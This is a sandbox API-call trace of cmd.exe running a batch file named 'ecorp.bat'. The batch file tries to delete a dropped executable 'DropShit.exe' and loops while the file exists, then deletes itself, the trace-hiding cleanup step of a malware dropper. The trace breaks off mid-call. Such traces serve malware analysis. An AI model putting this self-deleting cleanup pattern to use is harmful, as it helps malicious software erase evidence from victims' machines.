(_FileHandle=1) returned 0x7 [0091.836] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x10) returned 1 [0091.836] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.836] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.836] GetFileType (hFile=0x7) returned 0x2 [0091.837] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.837] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.837] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.837] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0091.837] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0091.837] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0091.837] GetConsoleTitleW (in: lpConsoleTitle=0x14ed00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.837] GetProcessHeap () returned 0x250000 [0091.837] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x251980 [0091.837] GetProcessHeap () returned 0x250000 [0091.837] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x251980, Size=0x30) returned 0x251980 [0091.837] GetProcessHeap () returned 0x250000 [0091.837] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x251980) returned 0x30 [0091.837] GetProcessHeap () returned 0x250000 [0091.837] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x38) returned 0x266aa0 [0091.837] GetProcessHeap () returned 0x250000 [0091.837] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x2519c0 [0091.837] GetProcessHeap () returned 0x250000 [0091.837] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2519c0, Size=0x30) returned 0x2519c0 [0091.838] GetProcessHeap () returned 0x250000 [0091.838] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x2519c0) returned 0x30 [0091.838] GetProcessHeap () returned 0x250000 [0091.838] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266ae0 [0091.838] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14e860 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.838] GetProcessHeap () returned 0x250000 [0091.838] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x251a00 [0091.838] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14d770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.838] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e280, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0091.838] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0091.838] GetProcessHeap () returned 0x250000 [0091.838] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x251a60 [0091.838] GetProcessHeap () returned 0x250000 [0091.838] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x251ac0 [0091.838] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.838] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.838] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.838] GetProcessHeap () returned 0x250000 [0091.838] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x26ccf0 [0091.838] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26cd00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.838] SetErrorMode (uMode=0x0) returned 0x0 [0091.838] SetErrorMode (uMode=0x1) returned 0x0 [0091.838] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x104, lpBuffer=0x14d790, lpFilePart=0x14d780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14d780*="DropShit.exe") returned 0x32 [0091.838] SetErrorMode (uMode=0x0) returned 0x1 [0091.838] GetProcessHeap () returned 0x250000 [0091.838] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x26cf10 [0091.838] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.838] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.839] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.839] GetProcessHeap () returned 0x250000 [0091.839] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266b20 [0091.839] GetProcessHeap () returned 0x250000 [0091.839] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x251d30 [0091.839] GetProcessHeap () returned 0x250000 [0091.839] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26d180 [0091.839] GetProcessHeap () returned 0x250000 [0091.839] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x810) returned 0x26d1f0 [0091.839] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x0, lpFindFileData=0x26d204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26d204) returned 0x26da10 [0091.839] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.839] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.839] GetLastError () returned 0x5 [0091.839] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x14dc38 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe\r\n") returned 52 [0091.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.839] GetFileType (hFile=0x7) returned 0x2 [0091.839] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.839] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14dbc8 | out: lpMode=0x14dbc8) returned 1 [0091.840] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.840] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14dc08, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14dc08*=0x34) returned 1 [0091.840] _get_osfhandle (_FileHandle=2) returned 0xb [0091.840] GetFileType (hFile=0xb) returned 0x2 [0091.840] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0091.840] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14db68 | out: lpMode=0x14db68) returned 1 [0091.840] _get_osfhandle (_FileHandle=2) returned 0xb [0091.840] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14dba0 | out: lpConsoleScreenBufferInfo=0x14dba0) returned 1 [0091.841] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.841] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x14dc10 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.841] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x14db90, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14db90*=0x13) returned 1 [0091.841] FindNextFileW (in: hFindFile=0x26da10, lpFindFileData=0x26d204 | out: lpFindFileData=0x26d204*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 0 [0091.842] GetLastError () returned 0x12 [0091.842] FindClose (in: hFindFile=0x26da10 | out: hFindFile=0x26da10) returned 1 [0091.842] GetProcessHeap () returned 0x250000 [0091.842] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d1f0 | out: hHeap=0x250000) returned 1 [0091.842] GetProcessHeap () returned 0x250000 [0091.842] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d180 | out: hHeap=0x250000) returned 1 [0091.842] GetProcessHeap () returned 0x250000 [0091.842] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266b20 | out: hHeap=0x250000) returned 1 [0091.842] GetProcessHeap () returned 0x250000 [0091.842] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251d30 | out: hHeap=0x250000) returned 1 [0091.842] GetProcessHeap () returned 0x250000 [0091.842] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf10 | out: hHeap=0x250000) returned 1 [0091.842] GetProcessHeap () returned 0x250000 [0091.842] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.843] GetProcessHeap () returned 0x250000 [0091.843] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251ac0 | out: hHeap=0x250000) returned 1 [0091.843] GetProcessHeap () returned 0x250000 [0091.843] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a60 | out: hHeap=0x250000) returned 1 [0091.843] GetProcessHeap () returned 0x250000 [0091.843] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a00 | out: hHeap=0x250000) returned 1 [0091.843] GetProcessHeap () returned 0x250000 [0091.843] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266ae0 | out: hHeap=0x250000) returned 1 [0091.843] GetProcessHeap () returned 0x250000 [0091.843] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2519c0 | out: hHeap=0x250000) returned 1 [0091.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.843] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.843] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.843] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.843] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.843] SetConsoleInputExeNameW () returned 0x1 [0091.843] GetConsoleOutputCP () returned 0x1b5 [0091.844] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.844] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.844] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.844] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.844] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.844] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.844] GetProcessHeap () returned 0x250000 [0091.844] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0091.844] GetProcessHeap () returned 0x250000 [0091.844] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251980 | out: hHeap=0x250000) returned 1 [0091.844] GetProcessHeap () returned 0x250000 [0091.844] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0091.844] GetProcessHeap () returned 0x250000 [0091.844] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0091.844] GetProcessHeap () returned 0x250000 [0091.844] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0091.844] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.844] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.844] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x34, lpOverlapped=0x0) returned 1 [0091.844] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.844] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=37, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="if exist \"DropShit.exe\" goto Repeat\r\n") returned 37 [0091.844] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.844] GetFileType (hFile=0x5c) returned 0x1 [0091.845] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.845] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.845] GetProcessHeap () returned 0x250000 [0091.845] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x26ccf0 [0091.845] GetProcessHeap () returned 0x250000 [0091.845] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.845] GetProcessHeap () returned 0x250000 [0091.845] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x2518c0 [0091.845] GetProcessHeap () returned 0x250000 [0091.845] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x27a2f0 [0091.845] GetProcessHeap () returned 0x250000 [0091.845] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x264610 [0091.845] GetProcessHeap () returned 0x250000 [0091.845] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x264610, Size=0x1e) returned 0x2645e0 [0091.845] GetProcessHeap () returned 0x250000 [0091.845] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x2645e0) returned 0x1e [0091.845] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0091.845] GetProcessHeap () returned 0x250000 [0091.845] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x251980 [0091.845] GetProcessHeap () returned 0x250000 [0091.845] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x264610 [0091.845] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0091.845] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0091.845] GetProcessHeap () returned 0x250000 [0091.845] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266a60 [0091.845] GetProcessHeap () returned 0x250000 [0091.845] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4c) returned 0x251a40 [0091.846] GetProcessHeap () returned 0x250000 [0091.846] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x251a40, Size=0x30) returned 0x251a40 [0091.846] GetProcessHeap () returned 0x250000 [0091.846] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x251a40) returned 0x30 [0091.846] GetProcessHeap () returned 0x250000 [0091.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x251a80 [0091.846] GetProcessHeap () returned 0x250000 [0091.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x278f90 [0091.846] GetProcessHeap () returned 0x250000 [0091.846] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x20) returned 0x278fc0 [0091.846] _tell (_FileHandle=3) returned 66 [0091.846] _close (_FileHandle=3) returned 0 [0091.846] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.846] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.846] GetFileType (hFile=0x7) returned 0x2 [0091.846] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.846] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.847] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.847] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.847] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.847] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.847] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.847] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.847] GetFileType (hFile=0x7) returned 0x2 [0091.847] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.847] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.847] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.847] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.848] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer="if ") returned 3 [0091.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.848] GetFileType (hFile=0x7) returned 0x2 [0091.848] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.848] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.848] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x3) returned 1 [0091.848] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x14efa8 | out: _Buffer="exist \"DropShit.exe\" ") returned 21 [0091.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.848] GetFileType (hFile=0x7) returned 0x2 [0091.849] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.849] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.849] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.849] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x15) returned 1 [0091.849] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.849] GetFileType (hFile=0x7) returned 0x2 [0091.849] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.849] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.849] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.849] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x278fa0*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x278fa0*, lpNumberOfCharsWritten=0x14efa8*=0x4) returned 1 [0091.850] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efa8 | out: _Buffer=" Repeat ") returned 8 [0091.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.850] GetFileType (hFile=0x7) returned 0x2 [0091.850] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.850] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.850] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1 [0091.850] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.850] GetFileType (hFile=0x7) returned 0x2 [0091.850] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.850] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.851] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.851] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x208, lpBuffer=0x14eae0, lpFilePart=0x14e880 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14e880*="DropShit.exe") returned 0x32 [0091.851] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0091.851] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x1, lpFindFileData=0x14e890, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e890) returned 0x251b40 [0091.851] FindClose (in: hFindFile=0x251b40 | out: hFindFile=0x251b40) returned 1 [0091.851] GetConsoleTitleW (in: lpConsoleTitle=0x14ec40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.851] GetProcessHeap () returned 0x250000 [0091.851] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266aa0 [0091.851] GetProcessHeap () returned 0x250000 [0091.851] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x266aa0, Size=0x20) returned 0x278ff0 [0091.851] GetProcessHeap () returned 0x250000 [0091.851] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x278ff0) returned 0x20 [0091.851] GetProcessHeap () returned 0x250000 [0091.851] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266aa0 [0091.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e6f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.852] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.852] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.852] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.852] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.852] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x51 [0091.852] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.852] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.852] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.852] GetFileType (hFile=0x5c) returned 0x1 [0091.852] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.852] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0xf, lpOverlapped=0x0) returned 1 [0091.852] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=15, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr="del ecorp.bat\r\n") returned 15 [0091.852] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.852] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.852] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.852] GetFileType (hFile=0x5c) returned 0x1 [0091.852] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.852] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x0, lpOverlapped=0x0) returned 1 [0091.852] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.852] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.852] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.852] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: 